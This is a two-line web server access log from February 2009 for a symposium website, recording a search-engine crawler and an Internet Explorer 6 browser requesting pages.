208.111.154.31 - - [03/Feb/2009:22:30:56 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.37 - - [03/Feb/2009:22:38:59 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.4)" 0 www.geil-symposium.com
